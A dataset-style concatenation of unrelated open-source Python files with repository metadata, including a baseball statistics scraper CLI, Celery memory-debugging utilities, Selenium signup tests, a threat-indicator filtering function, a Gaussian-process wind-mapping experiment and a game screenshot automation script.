"MIT"
] | 2 | 2018-12-07T20:13:03.000Z | 2020-06-03T11:34:59.000Z | bbscrape/__main__.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | null | null | null | bbscrape/__main__.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | null | null | null | import sys,argparse
from cmdprogress.bar import ProgBar
def parse_years(arg):
years = set()
for a in arg.split(','):
if '-' in a:
y0,y1 = map(int,a.split('-'))
years |= set(range(y0,y1+1))
else:
years |= {int(a)}
years = list(years)
years.sort()
return years
# ------------------------------------------------ spotrac ------------------------------------------------ #
def sr_captable(args):
from .spotrac import spotrac_keys,spotrac_captable
keys = [*spotrac_keys(args.years)]
print('scraping spotrac captables',file=sys.stderr)
prog = ProgBar().iter(keys)
for l in spotrac_captable(*next(prog)):
print(l,file=sys.stdout)
for year,team,url in prog:
tbl = iter(spotrac_captable(year,team,url))
next(tbl)
for l in tbl:
print(l,file=sys.stdout)
def sr_playertable(args):
from .spotrac import spotrac_keys,spotrac_playertable
keys = [*spotrac_keys(args.years)]
print('scraping spotrac playertables',file=sys.stderr)
prog = ProgBar().iter(keys)
for l in spotrac_playertable(*next(prog)):
print(l,file=sys.stdout)
for year,team,url in prog:
tbl = iter(spotrac_playertable(year,team,url))
next(tbl)
for l in tbl:
print(l,file=sys.stdout)
# ------------------------------------------------ fangraphs ------------------------------------------------ #
def fg_advbat(args):
from .fangraphs import fg_playerkeys,fg_advanced_batting
keys = fg_playerkeys(args.years)
print('scraping fangraphs advance batting',file=sys.stderr)
prog = ProgBar().iter(keys)
for l in fg_advanced_batting(*next(prog),args.years):
print(l,file=sys.stdout)
for fgid,pos in prog:
tbl = iter(fg_advanced_batting(fgid,pos,args.years))
next(tbl)
for l in tbl:
print(l,file=sys.stdout)
def fg_parkfactor(args):
from .fangraphs import fg_park_factors
print('scraping fangraphs parkfactors',file=sys.stderr)
prog = ProgBar().iter(args.years)
for l in fg_park_factors(next(prog)):
print(l,file=sys.stdout)
for year in prog:
tbl = iter(fg_park_factors(year))
next(tbl)
for l in tbl:
print(l,file=sys.stdout)
def fg_playerid(args):
from .fangraphs import fg_player_alphabet_links,fg_player_ids
print('scraping fangraphs player ids',file=sys.stderr)
alinks = [*fg_player_alphabet_links()]
print('fgid,player_name,position,first_year,last_year',file=sys.stdout)
for link in ProgBar().iter(alinks):
for l in fg_player_ids(link):
print(l,file=sys.stdout)
# ------------------------------------------------ bbr ------------------------------------------------ #
def bbr_team(args):
from .baseball_reference import bbr_teamkeys,bbr_team_table
if args.team == None and args.years==None:
print("Error: Need to provide at least a team(s) -t <team> or a year(s) -y <year> to scrape data from",file=sys.stderr)
return
keys = bbr_teamkeys(team=args.team,year=args.years)
print("scraping team '{}' tables from baseball-reference.com".format(args.tableid),file=sys.stderr)
prog = ProgBar().iter(keys)
for l in bbr_team_table(*next(prog),args.tableid):
print(l,file=sys.stdout)
for year,team in prog:
tbl = iter(bbr_team_table(year,team,args.tableid))
next(tbl)
for l in tbl:
print(l,file=sys.stdout)
def bbr_salary(args):
from .baseball_reference import bbr_teamkeys,bbr_salary_table
if args.team == None and args.years==None:
print("Error: Need to provide at least a team(s) -t <team> or a year(s) -y <year> to scrape data from",file=sys.stderr)
return
keys = bbr_teamkeys(team=args.team,year=args.years)
print("scraping salary tables from baseball-reference.com",file=sys.stderr)
prog = ProgBar().iter(keys)
for l in bbr_salary_table(*next(prog)):
print(l,file=sys.stdout)
for year,team in prog:
tbl = iter(bbr_salary_table(year,team))
next(tbl)
for l in tbl:
print(l,file=sys.stdout)
def bbr_teamid(args):
from .baseball_reference import bbr_teamids_year
print("scraping teamids from baseball-reference.com",file=sys.stderr)
prog = ProgBar().iter(args.years)
for l in bbr_teamids_year(next(prog)):
print(l,file=sys.stdout)
for year in prog:
tbl = iter(bbr_teamids_year(year))
next(tbl)
for l in tbl:
print(l,file=sys.stdout)
def main():
parser = argparse.ArgumentParser(prog='bbscrape',description='Baseball Data Scraper',epilog='Please consult https://github.com/luciancooper/bbcmd for further instruction')
subparsers = parser.add_subparsers(title="available data sources",metavar='source')
# ------------------------------------------------ year ------------------------------------------------ #
year_parser = argparse.ArgumentParser(add_help=False)
year_parser.add_argument('years',type=parse_years,help='Seasons to scrape data for')
# ------------------------------------------------ fangraphs ------------------------------------------------ #
parser_fg = subparsers.add_parser('fg', help='scrape data from fangraphs.com',description="Scrapes data from fangraphs.com")
parser_fg_subparsers = parser_fg.add_subparsers(title="available scraping commands",metavar='command')
# advbat
parser_fg_advbat = parser_fg_subparsers.add_parser('advbat',parents=[year_parser],help="scrape adv batting tables")
parser_fg_advbat.set_defaults(run=fg_advbat)
# parkfactor
parser_fg_parkfactor = parser_fg_subparsers.add_parser('parkfactor',parents=[year_parser],help="scrape parkfactor tables")
parser_fg_parkfactor.set_defaults(run=fg_parkfactor)
# playerid
parser_fg_playerid = parser_fg_subparsers.add_parser('playerid',parents=[year_parser],help="scrape fangraphs playerids")
parser_fg_playerid.set_defaults(run=fg_playerid)
# ------------------------------------------------ bbr ------------------------------------------------ #
parser_bbr = subparsers.add_parser('bbr', help='scrape data from baseball-reference.com',description="Scrapes data from baseball-reference.com")
parser_bbr_subparsers = parser_bbr.add_subparsers(title="available scraping commands",metavar='command')
# bbr_team
parser_bbr_team = parser_bbr_subparsers.add_parser('team',help="scrape bbr team tables")
parser_bbr_team.add_argument('tableid',metavar='tableid',choices=['players_value_batting','players_value_pitching','standard_fielding','appearances'],help="ID of table to scrape: 'players_value_batting','players_value_pitching','standard_fielding','appearances'")
parser_bbr_team.add_argument('-y','--years',type=parse_years,required=False,help='target years')
parser_bbr_team.add_argument('-t','--team',type=str,required=False,help='target teams')
parser_bbr_team.set_defaults(run=bbr_team)
# bbr_salary
parser_bbr_salary = parser_bbr_subparsers.add_parser('salary',help="scrape bbr salary tables")
parser_bbr_salary.add_argument('-y','--years',type=parse_years,required=False,help='target years')
parser_bbr_salary.add_argument('-t','--team',type=str,required=False,help='target teams')
parser_bbr_salary.set_defaults(run=bbr_salary)
# bbr_teamid
parser_bbr_teamid = parser_bbr_subparsers.add_parser('teamid',parents=[year_parser],help="scrape bbr teamids")
parser_bbr_teamid.set_defaults(run=bbr_teamid)
# ------------------------------------------------ spotrac ------------------------------------------------ #
parser_sr = subparsers.add_parser('sr', help='scrape data from spotrac.com',description="Scrapes salary datae from spotrac.com")
parser_sr_subparsers = parser_sr.add_subparsers(title="available scraping commands",metavar='command')
# playertable
parser_sr_playertable = parser_sr_subparsers.add_parser('playertable',parents=[year_parser],help="scrape player tables")
parser_sr_playertable.set_defaults(run=sr_playertable)
# captable
parser_sr_captable = parser_sr_subparsers.add_parser('captable',parents=[year_parser],help="scrape cap tables")
parser_sr_captable.set_defaults(run=sr_captable)
# ------------------------------------------------ ------------------------------------------------ #
args = parser.parse_args()
args.run(args)
| 44.328125 | 267 | 0.639055 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,604 | 0.305957 |
35150cb503f38ff16ebcf6a4b42f07d3240178e6 | 409 | py | Python | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | 10 | 2015-06-09T00:25:01.000Z | 2019-06-11T16:07:31.000Z | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | 25 | 2015-03-23T23:16:01.000Z | 2017-08-29T03:35:59.000Z | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
os.environ['POMAGMA_LOG_LEVEL'] = '3'
from pomagma.compiler.util import temp_memoize # isort:skip
from pomagma.reducer import bohm # isort:skip
print('Example 1.')
with temp_memoize():
bohm.sexpr_simplify('(ABS (ABS (1 0 (1 0))) (ABS (ABS (1 (0 0)))))')
print('Example 2.')
with temp_memoize():
bohm.sexpr_simplify('(ABS (ABS (0 1 1)) (ABS (ABS (1 (0 0)))))')
| 21.526316 | 72 | 0.655257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 181 | 0.442543 |
3515dc84f9b841feb94f0bde119df749e97f2631 | 4,709 | py | Python | scaper_concept/venv/lib/python3.9/site-packages/celery/utils/debug.py | edudbot/web-scraper | 12c07f805427699b2c3a35ed7c0d7efbc3673a7f | [
"MIT"
] | 3 | 2022-02-11T12:09:29.000Z | 2022-02-12T19:13:17.000Z | scaper_concept/venv/lib/python3.9/site-packages/celery/utils/debug.py | edudbot/web-scraper | 12c07f805427699b2c3a35ed7c0d7efbc3673a7f | [
"MIT"
] | null | null | null | scaper_concept/venv/lib/python3.9/site-packages/celery/utils/debug.py | edudbot/web-scraper | 12c07f805427699b2c3a35ed7c0d7efbc3673a7f | [
"MIT"
] | null | null | null | """Utilities for debugging memory usage, blocking calls, etc."""
import os
import sys
import traceback
from contextlib import contextmanager
from functools import partial
from pprint import pprint
from celery.platforms import signals
from celery.utils.text import WhateverIO
try:
from psutil import Process
except ImportError:
Process = None
__all__ = (
'blockdetection', 'sample_mem', 'memdump', 'sample',
'humanbytes', 'mem_rss', 'ps', 'cry',
)
UNITS = (
(2 ** 40.0, 'TB'),
(2 ** 30.0, 'GB'),
(2 ** 20.0, 'MB'),
(2 ** 10.0, 'KB'),
(0.0, 'b'),
)
_process = None
_mem_sample = []
def _on_blocking(signum, frame):
import inspect
raise RuntimeError(
f'Blocking detection timed-out at: {inspect.getframeinfo(frame)}'
)
@contextmanager
def blockdetection(timeout):
"""Context that raises an exception if process is blocking.
Uses ``SIGALRM`` to detect blocking functions.
"""
if not timeout:
yield
else:
old_handler = signals['ALRM']
old_handler = None if old_handler == _on_blocking else old_handler
signals['ALRM'] = _on_blocking
try:
yield signals.arm_alarm(timeout)
finally:
if old_handler:
signals['ALRM'] = old_handler
signals.reset_alarm()
def sample_mem():
"""Sample RSS memory usage.
Statistics can then be output by calling :func:`memdump`.
"""
current_rss = mem_rss()
_mem_sample.append(current_rss)
return current_rss
def _memdump(samples=10): # pragma: no cover
S = _mem_sample
prev = list(S) if len(S) <= samples else sample(S, samples)
_mem_sample[:] = []
import gc
gc.collect()
after_collect = mem_rss()
return prev, after_collect
def memdump(samples=10, file=None): # pragma: no cover
"""Dump memory statistics.
Will print a sample of all RSS memory samples added by
calling :func:`sample_mem`, and in addition print
used RSS memory after :func:`gc.collect`.
"""
say = partial(print, file=file)
if ps() is None:
say('- rss: (psutil not installed).')
return
prev, after_collect = _memdump(samples)
if prev:
say('- rss (sample):')
for mem in prev:
say(f'- > {mem},')
say(f'- rss (end): {after_collect}.')
def sample(x, n, k=0):
"""Given a list `x` a sample of length ``n`` of that list is returned.
For example, if `n` is 10, and `x` has 100 items, a list of every tenth.
item is returned.
``k`` can be used as offset.
"""
j = len(x) // n
for _ in range(n):
try:
yield x[k]
except IndexError:
break
k += j
def hfloat(f, p=5):
"""Convert float to value suitable for humans.
Arguments:
f (float): The floating point number.
p (int): Floating point precision (default is 5).
"""
i = int(f)
return i if i == f else '{0:.{p}}'.format(f, p=p)
def humanbytes(s):
"""Convert bytes to human-readable form (e.g., KB, MB)."""
return next(
f'{hfloat(s / div if div else s)}{unit}'
for div, unit in UNITS if s >= div
)
def mem_rss():
"""Return RSS memory usage as a humanized string."""
p = ps()
if p is not None:
return humanbytes(_process_memory_info(p).rss)
def ps(): # pragma: no cover
"""Return the global :class:`psutil.Process` instance.
Note:
Returns :const:`None` if :pypi:`psutil` is not installed.
"""
global _process
if _process is None and Process is not None:
_process = Process(os.getpid())
return _process
def _process_memory_info(process):
try:
return process.memory_info()
except AttributeError:
return process.get_memory_info()
def cry(out=None, sepchr='=', seplen=49): # pragma: no cover
"""Return stack-trace of all active threads.
See Also:
Taken from https://gist.github.com/737056.
"""
import threading
out = WhateverIO() if out is None else out
P = partial(print, file=out)
# get a map of threads by their ID so we can print their names
# during the traceback dump
tmap = {t.ident: t for t in threading.enumerate()}
sep = sepchr * seplen
for tid, frame in sys._current_frames().items():
thread = tmap.get(tid)
if not thread:
# skip old junk (left-overs from a fork)
continue
P(f'{thread.name}')
P(sep)
traceback.print_stack(frame, file=out)
P(sep)
P('LOCAL VARIABLES')
P(sep)
pprint(frame.f_locals, stream=out)
P('\n')
return out.getvalue()
| 24.273196 | 76 | 0.6031 | 0 | 0 | 911 | 0.193459 | 549 | 0.116585 | 0 | 0 | 1,793 | 0.38076 |
3517beedd46a5471e67dd32647db03c5051f3de7 | 5,038 | py | Python | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 377 | 2015-01-06T11:27:43.000Z | 2022-03-15T04:17:06.000Z | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 1,239 | 2015-01-01T14:05:18.000Z | 2022-03-30T06:00:39.000Z | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 176 | 2015-01-04T13:51:28.000Z | 2022-03-30T19:49:54.000Z | #!/usr/bin/env python
from browsers import browsers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
import time
import sys
import re
import signal
print 'Trustroots Selenium tests'
# URL is passed as an argument
if len(sys.argv) > 1:
test_url = sys.argv[1]
# Default to localhost
else:
test_url = 'http://localhost:3000/'
print 'Testing URL: ' + test_url
class Main:
def __init__(self):
try:
from config_browserstack import browserstack_url
no_browserstack = 0
except ImportError:
no_browserstack = 1
no_browserstack = 1
for cap in browsers:
if cap['env'] == 'remote' and no_browserstack:
if no_browserstack == 1:
print 'sorry, no browserstack'
no_browserstack = 2 # Should be cleaner
else:
if cap['env'] == 'local':
driver = getattr(webdriver, cap['browser'])()
else:
print 'launching', cap
driver = webdriver.Remote(
command_executor=browserstack_url,
desired_capabilities=cap
)
try:
self.t = TestSuite(driver, cap, test_url)
except:
print sys.exc_info()
finally:
if cap['env'] == 'remote':
driver.quit()
class TestSuite:
def __init__(self, driver, cap, url):
self.wait = WebDriverWait(driver, 15)
self.driver = driver
self.cap = cap
self.url = url
def signal_handler(signal, frame):
print('Handling Ctrl+C!')
if hasattr(self, 'driver') and self.driver:
print 'Trying driver.quit()'
self.driver.quit()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
try:
self.run_tests()
except:
print cap
print sys.exc_info()
def run_tests(self):
self.username = 'tester' + str(time.time())[5:10]
self.email = self.username + '@example.tld'
self.password = 'Tester123'
self.driver.get(self.url)
self.test_signup()
self.test_home_map()
self.test_logout_signin()
self.test_logout_signin_email()
def test_signup(self):
if not "Trustroots" in self.driver.title:
raise Exception("Unable to load page!")
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-signup')
if not 'Trustroots' in self.driver.title:
raise Exception("Unable to load page!")
self._wait_and_click(self.driver.find_element_by_id, 'firstName')
self.driver.find_element_by_id('firstName').send_keys('Tester')
self.driver.find_element_by_id('lastName').send_keys('Tester')
self.driver.find_element_by_id('username').send_keys(self.username)
self.driver.find_element_by_id('email').send_keys(self.email)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
self._wait_and_click(self.driver.find_element_by_id, 'signup-edit')
def test_logout_signin(self):
self.driver.get(self.url + 'auth/signout')
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
self.driver.find_element_by_id('username').send_keys(self.username)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
def test_logout_signin_email(self):
self.driver.get(self.url + 'auth/signout')
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
self.driver.find_element_by_id('username').send_keys(self.email)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
def test_home_map(self):
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.navbar-brand')
self.driver.find_element_by_id('search-query').send_keys('Berlin' + Keys.RETURN)
def _assert_contains_regexp(self, regexp):
text_found = re.search(regexp, self.driver.page_source)
print text_found
assert text_found != None
def _wait_and_click_id(self, _id, pause=0):
self._wait_and_click(self.driver.find_element_by_id, _id, pause)
def _wait_and_click(self, func, param, pause=0):
if pause == 0:
self.wait.until(lambda _: func(param).is_displayed())
else:
self._sleep(pause)
func(param).click()
m = Main()
| 33.812081 | 95 | 0.645693 | 4,426 | 0.878523 | 0 | 0 | 0 | 0 | 0 | 0 | 707 | 0.140333 |
351a506b1b2ee7c86af3ebc3248a1ec939c3dd9d | 1,845 | py | Python | lib/dcsotiesplunk/filtering.py | satta/TIE-Splunk-TA | 8d4636b96dfb63b4ca7b38f21d1c8a2d8dde392b | [
"BSD-3-Clause"
] | 2 | 2019-03-19T12:25:42.000Z | 2019-03-19T12:27:34.000Z | lib/dcsotiesplunk/filtering.py | satta/TIE-Splunk-TA | 8d4636b96dfb63b4ca7b38f21d1c8a2d8dde392b | [
"BSD-3-Clause"
] | 7 | 2019-03-28T17:32:33.000Z | 2020-06-17T10:45:20.000Z | lib/dcsotiesplunk/filtering.py | satta/TIE-Splunk-TA | 8d4636b96dfb63b4ca7b38f21d1c8a2d8dde392b | [
"BSD-3-Clause"
] | 1 | 2021-08-23T15:22:36.000Z | 2021-08-23T15:22:36.000Z | # Copyright (c) 2017, 2020, DCSO GmbH
import json
import sys
import os
# we change the path so that this app can run within the Splunk environment
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "lib"))
from dcsotie.errors import TIEError
from dcsotiesplunk.logger import get_logger
logger = get_logger().getChild('.filtering')
DATA_TYPE_FILTER_MAP = {
'IPv4': 'ip',
'URLVerbatim': 'url',
'DomainName': 'dom',
}
def filter_iocs(iocs, filters, fp=sys.stdout):
tmpl_filters = {
'confidence': None,
'max_severity': None
}
filter_cache = {}
for ioc in iocs:
try:
max_confidence = int(ioc['max_confidence'])
except (TypeError, ValueError):
logger.error("bad value for max_confidence; was {}".format(ioc['max_confidence']))
continue
try:
max_severity = int(ioc['max_severity'])
except (TypeError, ValueError):
logger.error("bad value for max_severity; was {}".format(ioc['max_severity']))
continue
dt = ioc['data_type']
try:
f = filter_cache[dt]
except KeyError:
# warm up
f = filter_cache[dt] = tmpl_filters.copy()
try:
p = DATA_TYPE_FILTER_MAP[ioc['data_type']]
f['confidence'] = filters[p + '_confidence']
f['max_severity'] = filters[p + '_severity']
except KeyError:
f['confidence'] = filters['confidence']
f['max_severity'] = filters['severity']
try:
if (f['confidence'].in_range(max_confidence)
and f['max_severity'].in_range(max_severity)):
print(json.dumps(ioc), file=fp)
except AttributeError as exc:
raise TIEError(str(exc))
| 29.758065 | 94 | 0.577236 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 493 | 0.267209 |
351cb7437ced7acc5333179d8ad7d5cb015b6375 | 7,388 | py | Python | tests/mapping_wind02.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | tests/mapping_wind02.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | tests/mapping_wind02.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/python3
import sys
sys.path.append('../../')
import numpy as np
import numpy.fft as npfft
import matplotlib.pyplot as plt
from matplotlib import animation
import time
from netCDF4 import MFDataset
from nephelae_simulation.mesonh_interface import MesoNHVariable
from nephelae_base.types import Position
from nephelae_base.types import Bounds
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process import kernels as gpk
class WindKernel(gpk.Kernel):
"""
Kernel compatible with sklearn.gaussian_process.Kernel
to be used in GaussianProcessRegressor
/!\ Hyper parameters optimizatin HAS NOT BEEN TESTED
When using with GaussianProcessRegressor, set optimizer=None
/!\ Only implemented for dimension (t,x,y) for now for testing purposes.
"""
# Actually used (maybe)
def __init__(self, lengthScale=[1.0,1.0,1.0],
stddev=1.0, noiseStddev=0.1,
windSpeed=[0.0,0.0]):
self.lengthScale = lengthScale
self.stddev = stddev
self.noiseStddev = noiseStddev
self.windSpeed = windSpeed
def __call__(self, X, Y=None):
if Y is None:
Y = X
# print("X shape: ", X.shape)
# print("Y shape: ", X.shape, end="\n\n")
cop = False
# cop = True
# Far from most efficient but efficiency requires C++ implementation (or is it ?)
t0,t1 = np.meshgrid(X[:,0], Y[:,0], indexing='ij', copy=cop)
dt = t1 - t0
distMat = (dt / self.lengthScale[0])**2
x0,x1 = np.meshgrid(X[:,1], Y[:,1], indexing='ij', copy=cop)
dx = x1 - (x0 + self.windSpeed[0] * dt)
distMat = distMat + (dx / self.lengthScale[1])**2
x0,x1 = np.meshgrid(X[:,2], Y[:,2], indexing='ij', copy=cop)
dx = x1 - (x0 + self.windSpeed[1] * dt)
distMat = distMat + (dx / self.lengthScale[2])**2
if Y is X:
return self.stddev*np.exp(-0.5*distMat) + np.diag([self.noiseStddev]*X.shape[0])
else:
return self.stddev*np.exp(-0.5*distMat)
def diag(self, X):
return np.array([self.stddev + self.noiseStddev]*X.shape[0])
def is_stationary(self):
return True
mesonhPath = '/home/pnarvor/work/nephelae/data/MesoNH-2019-02/REFHR.1.ARMCu.4D.nc'
rct = MesoNHVariable(MFDataset(mesonhPath), 'RCT')
# Estimating advective wind
ut = MesoNHVariable(MFDataset(mesonhPath), 'UT')[50.0, 1100.0,:,:].data.mean()
vt = MesoNHVariable(MFDataset(mesonhPath), 'VT')[50.0, 1100.0,:,:].data.mean()
print("Advective wind :", [ut, vt])
rctSlice = rct[240,1100,:,:].data
print("Variance : ", (rctSlice**2).mean())
t = np.linspace(0,300.0,300)
# a0 = 400.0
a0 = 250.0
f0 = - 1 / 120.0
# f0 = 1 / 150.0
a1 = 0.0
# f1 = 1.5*f0
f1 = 2.5*f0
# f1 = -1.3*f0
# f1 = -2.5*f0
# f1 = -4.5*f0
tStart = 50.0
tEnd = 700.0
t = np.linspace(tStart, tEnd, int(tEnd - tStart))
# p0 = Position(240.0, 1700.0, 2000.0, 1100.0)
# p0 = Position(50.0, 0.0, 2000.0, 1100.0)
p0 = Position(50.0, 100.0, 1950.0, 1100.0)
p = np.array([[p0.t, p0.x, p0.y, p0.z]]*len(t))
# v0 = np.array([[9.09, 0.68]])
v0 = np.array([8.5, 0.9])
p[:,0] = t
p[:,1] = p[:,1] + a0*(a1 + np.cos(2*np.pi*f1*(t-t[0])))*np.cos(2*np.pi*f0*(t-t[0]))
p[:,2] = p[:,2] + a0*(a1 + np.cos(2*np.pi*f1*(t-t[0])))*np.sin(2*np.pi*f0*(t-t[0]))
print("Max velocity relative to wind :",
max(np.sqrt(np.sum((p[1:,1:3] - p[:-1,1:3])**2, axis=1)) / (p[1:,0] - p[:-1,0])))
p[:,1:3] = p[:,1:3] + (t - tStart).reshape([len(t), 1]) @ v0.reshape([1,2])
# building prediction locations
# X0,Y0 = np.meshgrid(
# np.linspace(rct.bounds[3][0], rct.bounds[3][-1], rct.shape[3]),
# np.linspace(rct.bounds[2][0], rct.bounds[2][-1], rct.shape[2]))
b = rct.bounds
yBounds = [min(p[:,2]), max(p[:,2])]
tmp = rct[p0.t,p0.z,yBounds[0]:yBounds[1],:]
X0,Y0 = np.meshgrid(
np.linspace(tmp.bounds[1][0], tmp.bounds[1][-1], tmp.shape[1]),
np.linspace(tmp.bounds[0][0], tmp.bounds[0][-1], tmp.shape[0]))
xyLocations = np.array([[0]*X0.shape[0]*X0.shape[1], X0.ravel(), Y0.ravel()]).T
b[2].min = yBounds[0]
b[2].max = yBounds[1]
# Kernel
processVariance = 1.0e-8
noiseStddev = 0.1 * np.sqrt(processVariance)
# lengthScales = [100, 50, 50]
# lengthScales = [70, 50, 50]
lengthScales = [70, 60, 60]
# lengthScales = [140, 120, 120]
kernel0 = WindKernel(lengthScales, processVariance, noiseStddev**2, v0)
rctValues = []
print("Getting rct values... ", end='')
sys.stdout.flush()
for pos in p:
rctValues.append(rct[pos[0],pos[3],pos[2],pos[1]])
rctValues = np.array(rctValues)
print("Done !")
sys.stdout.flush()
noise = noiseStddev*np.random.randn(rctValues.shape[0])
rctValues = rctValues + noise
# # plotting rct values
# fig, axes = plt.subplots(1,1)
# axes.plot(p[:,0], np.array(rctValues))
# profiling = False
profiling = True
if not profiling:
fig, axes = plt.subplots(3,1,sharex=True,sharey=True)
simTime = p0.t
lastTime = time.time()
simSpeed = 50.0
def do_update(t):
print("Sim time :", t)
# prediction
gprProcessor0 = GaussianProcessRegressor(kernel0,
alpha=0.0,
optimizer=None,
copy_X_train=False)
# trainSet = np.array([list(pos) + [rctVal] \
# for pos, rctVal in zip(p[:,0:3],rctValues)\
# if pos[0] < t and pos[0] > t - 2*lengthScales[0]])
trainSet = np.array([list(pos) + [rctVal] \
for pos, rctVal in zip(p[:,0:3],rctValues)\
if pos[0] < t and pos[0] > t - 3*lengthScales[0]])
print("Number of used measures samples :", trainSet.shape[0])
gprProcessor0.fit(trainSet[:,:-1], trainSet[:,-1])
xyLocations[:,0] = t
map0, std0 = gprProcessor0.predict(xyLocations, return_std=True)
map0[map0 < 0.0] = 0.0
map0 = map0.reshape(X0.shape)
std0 = std0.reshape(X0.shape)
# display
if not profiling:
global axes
axes[0].cla()
axes[0].imshow(rct[t,p0.z,yBounds[0]:yBounds[1],:].data, origin='lower',
extent=[b[3].min, b[3].max, b[2].min, b[2].max])
axes[0].grid()
axes[0].set_title("Ground truth")
try:
axes[0].plot(p[:int(t-tStart + 0.5),1], p[:int(t-tStart + 0.5),2], '.')
finally:
pass
axes[1].cla()
axes[1].imshow(map0, origin='lower',
extent=[b[3].min, b[3].max, b[2].min, b[2].max])
axes[1].grid()
axes[1].set_title("MAP")
axes[2].cla()
axes[2].imshow(std0**2, origin='lower',
extent=[b[3].min, b[3].max, b[2].min, b[2].max])
axes[2].grid()
axes[2].set_title("Variance AP")
def init():
pass
def update(i):
# global lastTime
global simTime
# currentTime = time.time()
# simTime = simTime + simSpeed*(currentTime - lastTime)
# lastTime = currentTime
# simTime = simTime + 5.0
simTime = simTime + 2.0
do_update(simTime)
if not profiling:
anim = animation.FuncAnimation(
fig,
update,
init_func=init,
interval = 1)
plt.show(block=False)
else:
t0 = time.time()
while simTime < 600:
update(0)
print("Ellapsed :", time.time() - t0, "s")
| 30.03252 | 92 | 0.577829 | 1,794 | 0.242826 | 0 | 0 | 0 | 0 | 0 | 0 | 1,821 | 0.246481 |
351dc4da7ea35617cf860d3eec0ce499004d3deb | 1,432 | py | Python | interaction.py | BAFurtado/TLD | 7f6d8b0f1cfa0a03a30676058e84a1afa7dd273a | [
"MIT"
] | null | null | null | interaction.py | BAFurtado/TLD | 7f6d8b0f1cfa0a03a30676058e84a1afa7dd273a | [
"MIT"
] | null | null | null | interaction.py | BAFurtado/TLD | 7f6d8b0f1cfa0a03a30676058e84a1afa7dd273a | [
"MIT"
] | null | null | null | # coding: utf-8
# Originally from
# https://github.com/PPartisan/THE_LONG_DARK
# Simply adapted to LINUX by Bernardo Alves Furtado
import threading
import time
import psutil
from pylab import rcParams
from pynput.keyboard import Key, Controller
import mapping
rcParams['figure.figsize'] = 12, 9.5
def is_tld_running():
return True
processes_numbers = psutil.pids()
for n in processes_numbers:
if 'tld.x86_64' == psutil.Process(n).name():
return True
def background(func, args):
th = threading.Thread(target=func, args=args)
th.start()
class Interaction:
def __init__(self):
self.recording = True
self.keyboard = Controller()
def start_recording(self):
print('Started recording')
self.recording = True
def stop_recording(self):
print('Stopped recording')
self.recording = False
def press(self):
print(f'Pressed the button')
self.keyboard.press(Key.f8)
self.keyboard.release(Key.f8)
def start_interactive_mapping(self, s_path, f_path):
print(f'Started!')
if self.recording:
while is_tld_running():
self.press()
coord = mapping.read_coords_from_screenshots(s_path)
mapping.write_coords_to_file(coord, f_path + "coords.txt", "a")
mapping.delete_screenshots(s_path)
time.sleep(30)
| 23.866667 | 79 | 0.643855 | 844 | 0.589385 | 0 | 0 | 0 | 0 | 0 | 0 | 240 | 0.167598 |
3520d3fadcd76025a840929f26fb7ddd09ba91b1 | 7,205 | py | Python | multiply_ui/server/resources/workflows/multiply_workflow.py | RaT0M/multiply-ui | ad7fffb15cc962604340b31b38d34bc470fa8448 | [
"MIT"
] | null | null | null | multiply_ui/server/resources/workflows/multiply_workflow.py | RaT0M/multiply-ui | ad7fffb15cc962604340b31b38d34bc470fa8448 | [
"MIT"
] | 20 | 2019-05-21T10:33:36.000Z | 2019-12-11T08:13:29.000Z | multiply_ui/server/resources/workflows/multiply_workflow.py | RaT0M/multiply-ui | ad7fffb15cc962604340b31b38d34bc470fa8448 | [
"MIT"
] | 1 | 2020-10-14T12:32:36.000Z | 2020-10-14T12:32:36.000Z | import logging
import os
import signal
import sys
from pmonitor import PMonitor
logging.getLogger().setLevel(logging.INFO)
class MultiplyMonitor(PMonitor):
def __init__(self, parameters, types):
PMonitor.__init__(self,
['none', parameters['data_root']],
request=parameters['requestName'],
hosts=[('localhost', 10)],
types=types,
logdir=parameters['log_dir'],
simulation='simulation' in parameters and parameters['simulation'])
self._tasks_progress = {}
self._lower_script_progress = {}
self._upper_script_progress = {}
self._processor_logs = {}
self._pids = {}
self._to_be_cancelled = []
self._cancelled = []
